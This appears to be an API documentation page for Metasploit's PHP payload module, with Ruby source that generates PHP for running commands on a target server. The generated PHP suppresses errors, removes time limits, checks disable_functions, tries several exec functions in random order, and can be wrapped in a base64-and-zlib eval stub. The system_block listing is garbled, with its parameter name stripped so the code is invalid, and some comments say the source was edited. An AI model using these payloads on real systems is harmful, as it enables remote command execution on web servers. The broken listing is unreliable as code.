Module: Msf::Payload::Php
- Included in:
- Exploit::PhpEXE, BindTcp
- Defined in:
- lib/msf/core/payload/php.rb
Defined Under Namespace
Modules: BindTcp, ReverseTcp, SendUUID
Class Method Summary
- .create_exec_stub(php_code, options = {}) ⇒ Object
-
.preamble(options = {}) ⇒ String
Generate a chunk of PHP code that should be eval’d before #php_system_block.
-
.system_block(options = {}) ⇒ String
Generate a chunk of PHP code that tries to run a command.
Instance Method Summary
- #php_create_exec_stub(php_code) ⇒ Object
- #php_exec_cmd(cmd) ⇒ Object
- #php_preamble(options = {}) ⇒ Object
- #php_system_block(options = {}) ⇒ Object
Class Method Details
.create_exec_stub(php_code, options = {}) ⇒ Object
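# File 'lib/msf/core/payload/php.rb', line 168
# Wrap a PHP snippet in a self-decoding eval stub.
#
# The snippet is zlib-deflated, base64-encoded and embedded in
# `eval(gzuncompress(base64_decode('...')));`, optionally inside
# `<?php ... ?>` tags.  This is an encoding step (keeps the carrier free of
# quoting/escaping problems and shortens it), not protection: anyone who sees
# the stub can recover the original code with the same two calls.
#
# @param php_code [String] the PHP source to embed
# @param options [Hash]
# @option options [Boolean] :wrap_in_tags (true) emit the `<?php ... ?>` wrapper
# @return [String] the stub
def self.create_exec_stub(php_code, options = {})
  blob = Rex::Text.encode_base64(Rex::Text.zlib_deflate(php_code))
  stub = "eval(gzuncompress(base64_decode('#{blob}')));"
  # Explicit false disables the tags; a missing key defaults to wrapping.
  stub = "<?php #{stub} ?>" if options.fetch(:wrap_in_tags, true)
  stub
end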
.preamble(options = {}) ⇒ String
Generate a chunk of PHP code that should be eval’d before #php_system_block.
The generated code first silences error reporting and removes the execution-time limits, then initializes the disabled-functions variable (`disabled_varname`) as an array parsed from `ini_get('disable_functions')`, so that #php_system_block can skip execution functions the target has disabled.
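# File 'lib/msf/core/payload/php.rb', line 19
# Generate a chunk of PHP code that should be eval'd before .system_block.
#
# The emitted PHP:
# * opens with `/*<?php /**/`, which is a comment if the injection point is
#   already inside PHP and an open tag (preceded by literal `/*`) otherwise;
# * suppresses error reporting and removes the time limit / abort-on-
#   disconnect / max_execution_time limits (all with `@`, so failures are
#   silent);
# * reads `disable_functions` and canonicalizes it into an array of trimmed
#   names (empty array when the directive is unset) in the variable named by
#   `disabled_varname`, which .system_block consults via in_array().
#
# Only `disable_functions` is consulted; other restrictions (open_basedir,
# safe-mode style blacklists) are not detected here.
#
# @param options [Hash]
# @option options [Rex::RandomIdentifier::Generator, #[]] :vars_generator
#   source of variable names; a fresh PHP generator is created when absent
# @option options [String] :disabled_varname override for the disabled-list
#   variable name (a leading '$' is added if missing)
# @return [String] PHP code
def self.preamble(options = {})
  vars = options.fetch(:vars_generator) { Rex::RandomIdentifier::Generator.new(language: :php) }
  dis = options[:disabled_varname] || vars[:disabled_varname]
  dis = "$#{dis}" unless dis.start_with?('$')

  # Canonicalize the list of disabled functions (comma and/or space separated
  # in php.ini) so a system-like function can be chosen later.
  <<~TEXT
    /*<?php /**/
    @error_reporting(0);@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);
    #{dis}=@ini_get('disable_functions');
    if(!empty(#{dis})){
      #{dis}=preg_replace('/[, ]+/',',',#{dis});
      #{dis}=explode(',',#{dis});
      #{dis}=array_map('trim',#{dis});
    }else{
      #{dis}=array();
    }
  TEXT
end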
.system_block(options = {}) ⇒ String
Generate a chunk of PHP code that tries to run a command, attempting shell_exec, passthru, system, exec, proc_open and popen in a random order and skipping any that is not callable or is listed in the disabled-functions array built by .preamble.
# File 'lib/msf/core/payload/php.rb', line 59 def self.system_block( = {}) vars = .fetch(:vars_generator) { Rex::RandomIdentifier::Generator.new(language: :php) } cmd = [:cmd_varname] || vars[:cmd_varname] dis = [:disabled_varname] || vars[:disabled_varname] output = [:output_varname] || vars[:output_varname] cmd = '$' + cmd unless cmd.start_with?('$') dis = '$' + dis unless dis.start_with?('$') output = '$' + output unless output.start_with?('$') is_callable = vars[:is_callable_varname] in_array = vars[:in_array_varname] setup = '' if [:cmd] setup << <<~TEXT #{cmd}=base64_decode('#{Rex::Text.encode_base64([:cmd])}'); TEXT end setup << <<~TEXT if (FALSE!==stristr(PHP_OS,'win')){ #{cmd}=#{cmd}.\" 2>&1\\n\"; } #{is_callable}='is_callable'; #{in_array}='in_array'; TEXT shell_exec = <<~TEXT if(#{is_callable}('shell_exec')&&!#{in_array}('shell_exec',#{dis})){ #{output}=`#{cmd}`; }else TEXT passthru = <<~TEXT if(#{is_callable}('passthru')&&!#{in_array}('passthru',#{dis})){ ob_start(); passthru(#{cmd}); #{output}=ob_get_contents(); ob_end_clean(); }else TEXT system = <<~TEXT if(#{is_callable}('system')&&!#{in_array}('system',#{dis})){ ob_start(); system(#{cmd}); #{output}=ob_get_contents(); ob_end_clean(); }else TEXT exec = <<~TEXT if(#{is_callable}('exec')&&!#{in_array}('exec',#{dis})){ #{output}=array(); exec(#{cmd},#{output}); #{output}=join(chr(10),#{output}).chr(10); }else TEXT proc_open = <<~TEXT if(#{is_callable}('proc_open')&&!#{in_array}('proc_open',#{dis})){ $handle=proc_open(#{cmd},array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes); #{output}=NULL; while(!feof($pipes[1])){ #{output}.=fread($pipes[1],1024); } @proc_close($handle); }else TEXT popen = <<~TEXT if(#{is_callable}('popen')&&!#{in_array}('popen',#{dis})){ $fp=popen(#{cmd},'r'); #{output}=NULL; if(is_resource($fp)){ while(!feof($fp)){ #{output}.=fread($fp,1024); } } @pclose($fp); }else TEXT # Currently unused until we can figure out how to get output with COM # objects (which are not 
subject to safe mode restrictions) instead of # PHP functions. #win32_com = " # if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) { # $wscript = new COM('Wscript.Shell'); # $wscript->run(#{cmd} . ' > %TEMP%\\out.txt'); # #{output} = file_get_contents('%TEMP%\\out.txt'); # }else" fail_block = <<~TEXT { #{output}=0; } TEXT exec_methods = [passthru, shell_exec, system, exec, proc_open, popen] exec_methods = exec_methods.shuffle setup + exec_methods.join("") + fail_block end |
Instance Method Details
#php_create_exec_stub(php_code) ⇒ Object
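# File 'lib/msf/core/payload/php.rb', line 175
# Instance-side wrapper for .create_exec_stub.
#
# Forwards the options hash so callers can pass `wrap_in_tags: false`; the
# previous wrapper dropped it.  Calls the module under its declared name
# (Msf::Payload::Php); the original listing referenced Msf::Payload::PHP.
#
# @param php_code [String] the PHP source to embed
# @param options [Hash] see .create_exec_stub
# @return [String] the eval stub
def php_create_exec_stub(php_code, options = {})
  Msf::Payload::Php.create_exec_stub(php_code, options)
end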
#php_exec_cmd(cmd) ⇒ Object
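# File 'lib/msf/core/payload/php.rb', line 160
# Build a complete "run this command" PHP snippet: preamble followed by the
# system block, sharing one name generator so both agree on the variable that
# holds the disabled-functions list.
#
# The result carries no `<?php` open tag beyond the preamble's leading
# `/*<?php /**/`; wrap it with #php_create_exec_stub if tags are needed.
#
# @param cmd [String] command to run on the target
# @return [String] PHP code
def php_exec_cmd(cmd)
  vars = Rex::RandomIdentifier::Generator.new(language: :php)
  <<-END_OF_PHP_CODE
#{php_preamble(vars_generator: vars)}
#{php_system_block(vars_generator: vars, cmd: cmd)}
  END_OF_PHP_CODE
end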
#php_preamble(options = {}) ⇒ Object
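# File 'lib/msf/core/payload/php.rb', line 41
# Instance-side wrapper for .preamble.
#
# @param options [Hash] see .preamble
# @return [String] PHP code
def php_preamble(options = {})
  Msf::Payload::Php.preamble(options)
end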
#php_system_block(options = {}) ⇒ Object
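# File 'lib/msf/core/payload/php.rb', line 156
# Instance-side wrapper for .system_block.
#
# @param options [Hash] see .system_block
# @return [String] PHP code
def php_system_block(options = {})
  Msf::Payload::Php.system_block(options)
end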